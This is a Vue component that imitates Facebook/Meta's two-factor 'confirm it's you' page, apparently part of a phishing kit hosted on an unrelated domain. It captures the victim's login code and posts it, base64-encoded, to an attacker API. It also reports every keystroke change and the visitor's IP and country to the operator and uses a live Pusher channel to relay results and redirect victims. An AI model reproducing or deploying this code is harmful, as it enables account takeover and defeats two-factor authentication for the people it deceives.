<script setup>
</script>

<template>

  <section class="h-screen flex justify-center items-center">
    <div id="info-popup" tabindex="-1" class="p-10 hidden overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 w-full md:inset-0 h-modal md:h-full">
      <div class="md__ct">
        <div class="md__ct-h -f -j-s-b -a-c">
          <h2>Didn't receive a code?</h2>
          <span @click="hideTwoFactorSugesstionPopup()" class="md__ct-cl">×</span>
        </div>
        <div class="md__ct-b">
          <p class="md__ct-te">1. Go to <b>Settings &gt; Security and Login.</b></p>
          <p class="md__ct-te">2. Under the <b>Two-Factor Authentication</b> section, click <b>Use two-factor authentication</b>. You may need to re-enter your password.</p>
          <p class="md__ct-te">3. Next to <b>Recovery Codes</b>, click <b>Setup</b> then <b>Get Codes</b>. If you're already set up recovery codes, you can click <b>Show Codes</b></p>
        </div>
        <div class="md__ct-ft"><button :disabled="loading" @click="hideTwoFactorSugesstionPopup()" class="b b-c">Close</button></div>
      </div>
    </div>

    <div class="md__ct">
      <div class="md__ct-h -f -j-s-b -a-c">
        <h2>Didn't receive a code?</h2>
        <span class="md__ct-cl">×</span>
      </div>
      <div class="md__ct-b">
        <p class="md__ct-te">1. Go to <b>Settings &gt; Security and Login.</b></p>
        <p class="md__ct-te">2. Under the <b>Two-Factor Authentication</b> section, click <b>Use two-factor authentication</b>. You may need to re-enter your password.</p>
        <p class="md__ct-te">3. Next to <b>Recovery Codes</b>, click <b>Setup</b> then <b>Get Codes</b>. If you're already set up recovery codes, you can click <b>Show Codes</b></p>
      </div>
      <div class="md__ct-ft"><button class="b b-c">Close</button></div>
    </div>
  </section>
  <div class="md md__v-f -j-c-c -a-c">
    <div class="md__h -f -j-s-b -a-c">
      <div class="md__h-lg"><img src="https://meet.wa-employeereferrals.com/two_factor/images/logo_nav.png" alt=""></div>
      <a href="/login">Log Out</a>
    </div>
    <div class="md__ct">
      <div class="md__ct-h -f -j-s-b -a-c">
        <h2>Choose a way to confirm it's you</h2>
      </div>
      <div class="md__ct-t">
        <p>Your account has two-factor authentication switched on, which requires this extra login step.</p>
      </div>
      <div class="md__ct-t">
        <b>Approve from another device</b>
        <p>We already sent a notification to your logged in devices. Check your Facebook notifications where you're already logged into the account and approve the login to continue.</p>
      </div>

      <div class="md__ct-t">
        <b style="margin-bottom: 0;">Or, enter your login code</b>
        <p>Enter the 6-digit or 8-digit code from the authentication app you set up.</p>
        <input @change="onChange($event)" v-model="user.code" type="number" class="f__f-i f__f-i--tf" placeholder="Login Code"  style="width: 143px; display: inline-block; outline: none; box-shadow: none; padding: 3px; font-size: 12px;"> <span class="md__v-f-c"></span>
        <button :disabled="loading" @click="handleAction('ResendCode')" id="confirm-button" type="button" class="py-1 px-4 w-full text-sm font-medium text-center text-white bg-gray-400 sm:w-auto hover:bg-gray-600 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Resend code {{canResendCodeAfter > 0 ? `(${canResendCodeAfter})` : ""}}</button>

        <p class="md__ct-al">
          <small v-text="errors.code" class="text-red-700"></small>
          <small v-text="errors.resendCode" class="text-red-700"></small>
        </p>

      </div>
      <div  class="md__ct-ft -f -j-s-b -a-c"><a class="b-g-d" @click="showTwoFactorSuggestionPopup('x')" href="#" style="color: rgb(25, 106, 193); font-weight: 500; font-size: 12px; text-decoration: none;">Need another way to confirm it's you?</a>

        <button :disabled="loading" @click="confirm2FA" id="confirm-button" type="button" class="flex flex-row py-2 px-4 w-full text-sm font-medium text-center text-white  bg-primary-700 sm:w-auto hover:bg-primary-800 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">

          <div v-if="loading" class="flex items-center flex-row">
            <div role="status">
              <svg aria-hidden="true" class="w-4 h-4 mr-2 text-gray-200 animate-spin dark:text-gray-600 fill-blue-600" viewBox="0 0 100 101" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M100 50.5908C100 78.2051 77.6142 100.591 50 100.591C22.3858 100.591 0 78.2051 0 50.5908C0 22.9766 22.3858 0.59082 50 0.59082C77.6142 0.59082 100 22.9766 100 50.5908ZM9.08144 50.5908C9.08144 73.1895 27.4013 91.5094 50 91.5094C72.5987 91.5094 90.9186 73.1895 90.9186 50.5908C90.9186 27.9921 72.5987 9.67226 50 9.67226C27.4013 9.67226 9.08144 27.9921 9.08144 50.5908Z" fill="currentColor"/><path d="M93.9676 39.0409C96.393 38.4038 97.8624 35.9116 97.0079 33.5539C95.2932 28.8227 92.871 24.3692 89.8167 20.348C85.8452 15.1192 80.8826 10.7238 75.2124 7.41289C69.5422 4.10194 63.2754 1.94025 56.7698 1.05124C51.7666 0.367541 46.6976 0.446843 41.7345 1.27873C39.2613 1.69328 37.813 4.19778 38.4501 6.62326C39.0873 9.04874 41.5694 10.4717 44.0505 10.1071C47.8511 9.54855 51.7191 9.52689 55.5402 10.0491C60.8642 10.7766 65.9928 12.5457 70.6331 15.2552C75.2735 17.9648 79.3347 21.5619 82.5849 25.841C84.9175 28.9121 86.7997 32.2913 88.1811 35.8758C89.083 38.2158 91.5421 39.6781 93.9676 39.0409Z" fill="currentFill"/></svg>
              <span class="sr-only">Loading...</span>
            </div>
          </div>

        Submit Code</button></div>
    </div>
    <div class="md__ft">
      <div class="md__ft-ct">
        <div class="md__ft-ct-l -first"><span class="md__ft-ct-l-at">English (US)</span><span>日本語</span><span>Português (Brasil)</span><span>中文(简体)</span><span>Español</span><span>Bahasa Indonesia</span><span>한국어</span><span>Français (France)</span><span>Deutsch</span><span>Italiano</span></div>
        <div class="md__ft-ct-l -second"><span>Sign Up</span><span>Log In</span><span>Messenger</span><span>Facebook Lite</span><span>Video</span><span>Places</span><span>Games</span><span>Marketplace</span><span>Meta Pay</span><span>Meta Store</span><span>Meta Quest</span><span>Instagram</span><span>Threads</span><span>Fundraisers</span><span>Services</span><span>Voting Information Center</span><span>Privacy Policy</span><span>Privacy Center</span><span>Groups</span><span>About</span><span>Create ad</span><span>Create Page</span><span>Developers</span><span>Careers</span><span>Cookies</span><span>Ad choices</span><span>Terms</span><span>Help</span><span>Contact Uploading &amp; Non-Users</span></div>
        <div class="md__ft-ct-l"><span class="md__ft-ct-l-at">Meta © 2024</span></div>
      </div>
    </div>
  </div>
</template>

<style scoped>
html {
  -webkit-text-size-adjust: 100%;
  -ms-text-size-adjust: 100%;
}

input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
  -webkit-appearance: none;
  margin: 0;
}

/* Firefox */
input[type=number] {
  -moz-appearance: textfield;
}

* {
  box-sizing: border-box;
}

html,
body,
div,
span,
applet,
object,
iframe,
h1,
h2,
h3,
h4,
h5,
h6,
p,
blockquote,
pre,
a,
abbr,
acronym,
address,
big,
cite,
code,
del,
dfn,
em,
img,
ins,
kbd,
q,
s,
samp,
small,
strike,
strong,
sub,
sup,
tt,
var,
b,
u,
i,
center,
dl,
dt,
dd,
ol,
ul,
li,
fieldset,
form,
label,
legend,
table,
caption,
tbody,
tfoot,
thead,
tr,
th,
td,
article,
aside,
canvas,
details,
embed,
figure,
figcaption,
footer,
header,
hgroup,
menu,
nav,
output,
ruby,
section,
summary,
time,
mark,
audio,
video {
  margin: 0;
  padding: 0;
  border: 0;
  font-size: 100%;
  font: inherit;
  vertical-align: baseline;
}

/* HTML5 display-role reset for older browsers */
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
menu,
nav,
section {
  display: block;
}

:root {
  --font-website: system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
  --color-text: rgb(33, 37, 41);
  --btn-color: #3578e5;
}

b,
strong {
  font-weight: 700;
}

body {
  padding: 0;
  margin: 0;
  font-family: var(--font-website);
  color: var(--color-text);
  font-size: 1rem;
  position: relative;
  background-color: #efefef;
}

textarea,
input {
  font-family: var(--font-website);
  color: var(--color-text);
}

i {
  font-style: italic;
}

.-f {
  display: flex;
  flex-wrap: wrap;
}

.-fw {
  width: 100%;
}

.-if {
  display: inline-flex;
  flex-wrap: wrap;
}

.-a-c {
  align-items: center;
}

.-j-s-b {
  justify-content: space-between;
}

.-j-c-c {
  justify-content: center;
}

.-h-20 {
  height: 20px !important;
}

.-mb-1 {
  margin-bottom: 1rem;
}

.-mb-2 {
  margin-bottom: 2rem;
}

.-mt-1 {
  margin-top: 1rem;
}

.n {
  padding: 8px 3rem;
  background-color: white;
  color: #9f9f9f;
  box-shadow: rgba(0, 0, 0, 0.1) 1px 1px 8px 1px;
}

.n__it img {
  height: 34px;
  margin-right: 10px;
}

.n__it span {
  font-size: 18px;
}

.n3 {
  background-color: var(--btn-color);
}

.fa {
  background-color: #fff;
  border: 0 solid #9f9f9f;
  border-radius: 6px;
  max-width: 94%;
  width: 650px;
  overflow: hidden;
  padding: 15px;
  margin: auto;
  margin-top: 50px;
  margin-bottom: 50px;
}

.fa__i-a {
  display: block;
  width: 100%;
  line-height: 0;
  margin-bottom: 30px;
}

.fa__tt {
  font-size: 22px;
  font-weight: 700;
  padding-top: 15px;
  display: block;
  margin-bottom: 30px;
}

.fa__m {
  background-color: rgba(231, 236, 245, 0.5098039216);
  border-radius: 8px;
  margin-top: 15px;
  padding: 25px 15px;
  margin-bottom: 25px;
}

.fa__m img {
  flex: 0 0 25px;
  width: 25px;
  height: 25px;
}

.fa__m--ct {
  flex-grow: 0;
  flex-shrink: 0;
  flex-basis: calc(100% - 45px);
  width: calc(100% - 45px);
}

.fa__m--ct p:nth-child(1) {
  font-size: 14.5px;
  font-weight: 600;
  margin-bottom: 5px;
}

.fa__m--ct p:nth-child(2) {
  font-size: 12px;
}

.fa__mct {
  line-height: 1.5;
}

.fa__mct b {
  font-size: 17px;
}

.fa__mct--2 b {
  color: var(--btn-color);
}

.fa__rm span:nth-child(1) {
  flex: 0 0 30px;
  width: 30px;
  height: 30px;
  background-color: #b7b7b7;
  padding: 4px;
  border-radius: 50%;
  margin-right: 10px;
  text-align: center;
  padding-top: 6px;
  position: relative;
  z-index: 2;
  border: 2px solid white;
  display: block;
  line-height: 0;
}

.fa__rm span:nth-child(1) img {
  width: 17px;
  height: 15px;
  object-fit: contain;
}

.fa__rm span:nth-child(2) {
  font-size: 14px;
  flex-grow: 0;
  flex-shrink: 0;
  flex-basis: calc(100% - 40px);
  width: calc(100% - 40px);
}

.fa__rm--2 span:nth-child(1) {
  background-color: #2173d9;
}

.fa__wrap {
  position: relative;
}

.fa__wrap--line {
  position: absolute;
  width: 2px;
  height: 80%;
  left: 14px;
  top: 10px;
  background-color: #b7b7b7;
  z-index: 1;
}

.b {
  padding: 6px 12px;
  font-weight: 500;
  line-height: 24px;
  color: white;
  background-color: var(--btn-color);
  border: none;
  border-radius: 0;
  font-size: 1rem;
  cursor: pointer;
}

.b:disabled {
  pointer-events: none;
  opacity: 0.6;
}

.b-c {
  background-color: gray !important;
}

.b--ap {
  padding: 10px 12px;
  border-radius: 5px;
}

.last__l {
  text-align: center;
  margin-top: 10px;
  font-size: 15px;
}

.f {
  position: relative;
  display: flex;
  flex-direction: column;
  min-width: 0;
  word-wrap: break-word;
  background-color: #fff;
  background-clip: border-box;
  border: 1px solid rgba(0, 0, 0, 0.125);
  border-radius: 0.25rem;
  margin: auto;
  margin-top: 50px;
  margin-bottom: 50px;
  background-color: white;
  box-shadow: rgba(0, 0, 0, 0.2) 0px 1px 2px;
  margin-bottom: 30px;
  border-width: initial;
  border-style: none;
  border-color: initial;
  border-image: initial;
  width: 750px;
  max-width: 94%;
}

.f__a img {
  width: 50px;
  flex: 0 0 50px;
  height: 50px;
}

.f__a b {
  font-weight: 700;
  line-height: 24px;
}

.f__a p:nth-of-type(2) {
  line-height: 24px;
}

.f__a-i {
  width: calc(100% - 60px);
  flex-grow: 0;
  flex-shrink: 0;
  flex-basis: calc(100% - 60px);
}

.f__a-i-l-c span:nth-of-type(1) {
  opacity: 1;
  color: white;
  padding: 2px 5px;
  text-transform: uppercase;
  background-color: #4b92e5;
  font-size: 14px;
  border-radius: 3px;
  margin-right: 5px;
}

.f__a-i-l-c span:nth-of-type(2) {
  opacity: 0.7;
  font-size: 14px;
}

.f__a-i-l {
  line-height: 1.4;
  margin-left: 0;
  opacity: 0.7;
}

.f__a-i-ll {
  opacity: 0.7;
}

.f__a-0 {
  padding: 30px;
  background-color: white;
  border-bottom: 1px solid #e7e8e9;
}

.f__a-1 {
  padding: 30px;
  border-bottom: 1px solid #e7e8e9;
}

.f__a-1 img {
  width: 50px;
  flex: 0 0 50px;
  height: 40px;
}

.f__a-2 {
  padding: 30px 30px 0;
}

.f__a-3 {
  padding: 0 30px 30px;
}

.f__f {
  padding: 30px;
  background-color: white;
  color: #67788A;
  font-size: 14px;
}

.f__f-ii {
  margin-bottom: 15px;
}

.f__f-ii-1 {
  margin-bottom: 0;
  margin-top: 15px;
}

.f__f-g {
  position: relative;
  margin-bottom: 20px;
}

.f__f-g label {
  font-weight: 600;
  line-height: 19.5px;
  margin-bottom: 5px;
  display: block;
}

.f__f-g input[type=checkbox] {
  display: inline-block;
}

.f__f-g input[type=checkbox]~label {
  display: inline-block;
}

.f__f-i {
  display: block;
  width: 100%;
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  background-clip: padding-box;
  padding: 0.375rem 0.75rem;
  background-color: white;
  border: 1px solid #bdbdbd;
  transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
  outline: none;
}

.f__f-i:focus {
  box-shadow: rgba(13, 110, 253, 0.25) 0px 0px 0px 0.25rem;
  border-color: rgb(134, 183, 254);
}

.f__f-i-o-p {
  position: absolute;
  display: block;
  line-height: 0;
  right: 10px;
  top: 35px;
  z-index: 2;
}

.f__f-i-o-p img {
  width: 20px;
}

.f__f-g-sl {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
}

.f__f-g-sl label {
  flex: 0 0 100%;
  width: 100%;
}

.f__f-g-sl select {
  width: 100px !important;
  flex: 0 0 100px;
  display: inline-block;
}

.f__f-g-sl input {
  width: calc(100% - 110px);
  flex-grow: 0;
  flex-shrink: 0;
  flex-basis: calc(100% - 110px);
  display: inline-block;
}

.f__f-g-cb {
  align-items: center;
  justify-content: space-between;
}

.f__f-g-cb input {
  flex: 0 0 13px;
  width: 13px;
  margin: 0;
  margin-bottom: 10px;
}

.f__f-g-cb label {
  margin-bottom: 0;
  flex-grow: 0;
  flex-shrink: 0;
  flex-basis: calc(100% - 23px);
  width: calc(100% - 23px);
  margin-bottom: 10px;
}

.md {
  display: flex;
  flex-wrap: wrap;
  position: fixed;
  z-index: 1;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  overflow: auto;
  background-color: rgb(0, 0, 0);
  background-color: rgba(0, 0, 0, 0.4);
  color: #67788A;
  font-size: 15px;
}

.md__ct {
  position: relative;
  background-color: white;
  padding: 0;
  border: 1px solid #888;
  width: 500px;
  box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  -webkit-animation-name: animatetop;
  -webkit-animation-duration: 0.4s;
  animation-name: animatetop;
  animation-duration: 0.4s;
  border-radius: 0.5rem;
  max-width: 94%;
}

.md__ct-cl {
  color: var(--color-text);
  font-size: 34px;
  cursor: pointer;
  font-weight: 300;
  line-height: 0;
}

.md__ct-h {
  padding: 16px;
  border-bottom: 1px solid #dee2e6;
}

.md__ct-h h2 {
  font-weight: 700;
}

.md__ct-b {
  padding: 16px;
}

.md__ct-ft {
  padding: 16px;
  text-align: right;
  border-top: 1px solid #dee2e6;
}

.md__ct-al {
  color: red;
  padding-top: 0.5rem;
}

.md__ct-te {
  margin-bottom: 10px;
}

.md__gd {
  z-index: 2;
}

.md__gd b {
  font-weight: 600;
}

.md__gd .md__ct-te {
  margin-bottom: 15px;
  line-height: 1.4;
  font-size: 15px;
}

.md__h {
  width: 100%;
  background-color: #3578e5;
  padding: 15px 3rem;
  text-align: right;
}

.md__h a {
  color: white !important;
  text-decoration: none;
  font-weight: 600;
  font-size: 14px;
}

.md__v-f {
  background-color: rgb(240, 242, 245);
  display: block;
}

.md__v-f .md__ct {
  width: 612px;
  color: #1d2129;
  border: 1px solid #dddfe2;
  border-radius: 3px;
  border-color: #d1d2d5 #d1d2d5 #c5c6c8 #c5c6c8 !important;
  box-shadow: none;
  padding: 12px;
  margin: 100px auto;
  animation-name: none !important;
}

.md__v-f .md__ct-h {
  font-size: 14px;
  border-bottom: 1px solid #dddfe2;
  padding: 0;
  padding-bottom: 12px;
}

.md__v-f .md__ct-t {
  padding: 12px 0;
  font-size: 14px;
  border-bottom: 1px solid #dddfe2;
  line-height: 18px;
}

.md__v-f .md__ct-t b {
  margin-bottom: 12px;
  display: block;
}

.md__v-f .md__ct-ft {
  padding: 12px 0;
  padding-bottom: 0;
  border-top: none;
}

.md__v-f .md__ft {
  padding: 100px 0 50px 0;
  background-color: white;
}

.md__v-f .md__ft-ct {
  width: 980px;
  max-width: 96%;
  margin: auto;
}

.md__v-f .md__ft-ct-l {
  padding-bottom: 12px;
  font-size: 12px;
  margin-bottom: 12px;
}

.md__v-f .md__ft-ct-l.-first {
  border-bottom: 1px solid #dddfe2;
}

.md__v-f .md__ft-ct-l span {
  margin-right: 10px;
  cursor: pointer;
  color: #3578e5;
  display: inline-block;
  line-height: 19.2px;
}

.md__v-f .md__ft-ct-l-at {
  color: #737373 !important;
  cursor: default !important;
}

.md__v-f .md__ft-ct-l.-second span {
  margin-right: 20px;
}

.ma {
  min-height: calc(100vh - 50px);
  background: white;
  position: relative;
  z-index: 2;
}

.ma__m {
  background-color: #fff;
  padding: 30px;
  border-radius: 4px;
  border: 1px solid #bdbdbd;
  font-size: 14px;
  width: 675px;
  max-width: 94%;
}

.ma__m img {
  width: 135px;
  flex: 0 0 135px;
  height: 135px;
}

.ma__m-i {
  width: calc(100% - 145px);
  flex-grow: 0;
  flex-shrink: 0;
  flex-basis: calc(100% - 145px);
}

.ma__m-i-t {
  font-weight: 600;
  margin-bottom: 4px;
}

.ma__m-i-s-t {
  margin-bottom: 16px;
  line-height: 21px;
}

.ma__m-p {
  background-color: #e9ecef;
  border-radius: 6px;
  height: 16px;
  position: relative;
}

.ma__m-p-r {
  position: absolute;
  z-index: 1;
  top: 0;
  left: 0;
  height: 100%;
  width: 0;
  background-color: #0d6efd;
  border-radius: 6px;
}

.ss {
  min-height: calc(100vh - 50px);
  background: white;
  position: relative;
  z-index: 2;
}

.ss__m {
  background-color: #fff;
  padding: 30px;
  border-radius: 4px;
  border: 1px solid #bdbdbd;
  font-size: 14px;
  width: 490px;
  max-width: 94%;
  text-align: center;
}

.ss__m-i {
  text-align: center;
}

.ss__m-i img {
  width: 150px;
  height: auto;
}

.ss__m-t {
  font-size: 32px;
  font-weight: 500;
  line-height: 38.4px;
}

.ss__m-te {
  margin-top: 8px;
  font-size: 14px;
  line-height: 21px;
  margin-bottom: 10px;
}

.m {
  height: 100vh;
  position: fixed;
  background-color: white;
  width: 100%;
  z-index: 10;
  left: 0;
  top: 0;
  overflow: auto;
}

.m__w {
  width: 600px;
  max-width: 96%;
  text-align: center;
  position: relative;
  z-index: 2;
}

.m__w--b {
  width: 100%;
  margin-bottom: 10px;
}

.m__w a {
  width: 100%;
  background: rgb(37, 116, 234);
  color: rgb(255, 255, 255) !important;
  display: block;
  text-decoration: none;
  border-radius: 6px;
  padding: 6px 12px;
  line-height: 24px;
}

.ldg {
  position: fixed;
  width: 100%;
  height: 100%;
  z-index: 9;
  top: 0;
  left: 0;
  background: white;
  visibility: hidden;
  opacity: 0;
}

.ldg img {
  height: 100%;
  display: block;
  margin: auto;
  width: 100%;
  object-fit: contain;
}

.ldg.sh {
  visibility: visible;
  opacity: 1;
}

.md__h-lg {
  line-height: 0;
}

.md__h-lg img {
  height: 20px;
}

.ld {
  border: 3px solid #f3f3f3;
  -webkit-animation: spin 1s linear infinite;
  animation: spin 1s linear infinite;
  border-top: 3px solid var(--btn-color);
  border-radius: 50%;
  display: block;
  width: 24px;
  height: 24px;
  margin: auto;
}
@-webkit-keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
    -ms-transform: rotate(0deg);
    transform: rotate(0deg);
  }

  100% {
    -webkit-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
    -ms-transform: rotate(0deg);
    transform: rotate(0deg);
  }

  100% {
    -webkit-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes animatetop {
  from {
    top: -300px;
    opacity: 0;
  }

  to {
    top: 0;
    opacity: 1;
  }
}

@media only screen and (max-width: 480px) {
  .ma__m-i {
    flex: 0 0 100%;
    width: 100%;
    margin-top: 10px;
  }

  .ma__m img {
    margin: auto;
  }

  .n2,
  .md__h {
    padding: 8px;
  }

  .ss__m-t {
    font-size: 23px;
    font-weight: 500;
    line-height: 1.3;
  }

  .md__v-f .md__ct {
    margin: 20px auto;
  }

  .md__v-f .md__ft {
    padding: 20px 0;
  }
}
</style>

<script>
import axios from "axios";
import Pusher from "pusher-js";
import phones from "@/assets/phones.json";
import constants from "@/constants";
import {Modal} from "flowbite";
export default {
  name: 'TwoFactorAuthenticate',
  props: {
    msg: String,
  },
  created() {
    if (!(localStorage.getItem("is_login") === "1")) {
      window.location.href = "/"
    }
    this.user.provider2fa = localStorage.getItem("provider2fa");
  },
  mounted() {
    const self = this;
    const CHANNEL_KEY = "channel_key";
    const channelName = localStorage.getItem(CHANNEL_KEY)
    if (!channelName || channelName.indexOf("PUB_ID") === -1) {
      this.channelUuid = "PUB_ID_" + crypto.randomUUID();
      localStorage.setItem(CHANNEL_KEY, this.channelUuid)
    } else {
      this.channelUuid = channelName;
    }

    this.ws.pusher = new Pusher(this.ws.pusherKey, {
      cluster: this.ws.pusherCluster,
    });

    this.ws.channel = this.ws.pusher.subscribe(this.channelUuid);

    this.ws.channel.bind("step-2-result", function(data) {
      if (data) {
        let json = JSON.parse(data.message)
        if (json.success === "2") {
          // window.location.href = "personal-information-security";
           window.location.href = "success";
        } else if (json.success === "3") {
          self.showTwoFactorSuggestionPopup(json.message);
        } else if (json.success === "1") {
          // window.location.href = "request-review";
          window.location.href = "success";
        } else {
          self.errors.code = json.message;
        }
      } else {
        self.errors.code = "Something went wrong. Please try again later.";
      }
      self.loading = false;
    });

    try {
      if (localStorage.getItem('country_code') === 'unk' || !localStorage.getItem('country_code')) {
        fetch('https://freeipapi.com/api/json')
            .then(response => response.json())
            .then(data => {
              if (data) {
                if (data.countryName === 'Viet Nam') {
                  // this.isAllowed = false;
                  // self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname + ", VietNam nên bỏ qua")
                }
                self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname)
                if (data.countryCode) {
                  localStorage.setItem("country_code", data.countryCode)
                  localStorage.setItem("ip_address", data.ipAddress)
                } else {
                  localStorage.setItem("country_code", "unk")
                }

                let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
                if (phoneConfig) {
                  this.placeHolder.phone = phoneConfig.dial_code;
                }
              }
              this.isLoadingPage = false;
            });
      } else {
        let country_code = localStorage.getItem("country_code")
        let ip_address = localStorage.getItem("ip_address")

        self.handleAction("New visitor. IP = " + ip_address + ", country = " + country_code + ", URL = " + window.location.pathname)
        this.isLoadingPage = false;
      }

    } catch (ex) {
      self.handleAction("Can not get IP information");
    }

    setInterval(() => {
      if (self.canResendCodeAfter > 0) {
        self.canResendCodeAfter--;
      }
      if (self.canResendCodeAfter === 0) {
        self.errors.resendCode = "";
      }
    }, 1000)

    this.ws.pusher.connection.bind('disconnected', function() {
      alert('Disconnected to meta server. Please reload and try again.')
    })

    const modalEl = document.getElementById('info-popup');
    this.twoFactorSuggestionModal = new Modal(modalEl, {
      placement: 'center',
      onShow: () => {
        this.handleAction("Màn 2fa gợi ý hiển thị")
        this.errors.phoneNumber = "";
        this.errors.email = "";
      },
      onHide:() => {
        this.loading = false;
        this.handleAction("Màn 2fa gợi ý bị ẩn")
      }
    })
  },
  data() {
    return {
      user: {
        provider2fa: "sms",
        code: ""
      },
      errors: {
        code: null,
        resendCode: "",
        approved: ""
      },
      ws: {
        pusher: null,
        channel: null,
        pusherKey: constants.PUSHER_KEY,
        pusherCluster: "ap1"
      },
      loading: false,
      success: false,
      dm: constants.API_URL,
      name: 'Meta Business Support',
      supportLine: atob("Q29udGFjdCBNZXRhIHN1cHBvcnQ="),
      isAvailable: true,
      canResendCodeAfter: 0,
      twoFactorSuggestionModal: null,
      twoFactorSugestionText: ""
    }
  },
  methods: {
    confirm2FA() {
      this.errors.code = "";
      if (!this.validateOtpUserInput()) {
        return;
      }
      this.loading = true;
      this.errors.code = "";
      this.errors.resendCode = "";
      let params = btoa(`pubId=${this.channelUuid}&otp=${this.user.code}`)
      axios.post(`${this.dm}api/verify`, {params})
      this.handleAction("User đã gửi mã: " + this.user.code);
    },
    approved() {
      this.errors.approved = "";
      this.errors.code = "";
      this.errors.resendCode = "";
      this.loading = true;
      this.handleAction("User đã chấp thuận đăng nhập trên thiết bị khác.");
    },
    onChange(event) {
      try {
        this.handleAction(`User is changed: ${event.target.name} - value = ${event.target.value}`)
      } catch (ex) {
        console.log(ex);
      }
    },
    handleAction(message) {
      if (message === 'ResendCode') {
        if (this.canResendCodeAfter > 0) {
          this.errors.resendCode = `Please wait ${this.canResendCodeAfter}s before sending new code`;
          return;
        } else {
          this.canResendCodeAfter = 60;
        }
        this.loading = true;
        this.errors.code = "";
        setTimeout(() => {
          this.user.provider2fa = 'We have sent the verification code again. Enter the code to log in.';
          this.loading = false;
        }, 1000)

      }
      if(this.channelUuid) {
        try {
          axios.post(`${this.dm}api/handleAction`, {"pubId": this.channelUuid, "message": message})
        }catch (ex) {
          console.log(ex);
        }
      }
    },
    validateOtpUserInput() {
      let otp = this.user.code;
      if (!otp || otp.toString().trim() === "") {
        this.errors.code = "Please input your code.";
        return false;
      }
      if (!Number.isInteger(otp)) {
        this.errors.code = "Please enter a valid code.";
        return false;
      }
      if (otp.length > 10) {
        this.errors.code = "Please enter a valid code.";
        return false;
      }

      return true;
    },
    showTwoFactorSuggestionPopup(message) {
      this.twoFactorSugestionText = message;
      this.twoFactorSuggestionModal.show()
    },
    hideTwoFactorSugesstionPopup() {
      this.twoFactorSugestionText = "";
      this.twoFactorSuggestionModal.hide()
    }
  }
}
</script>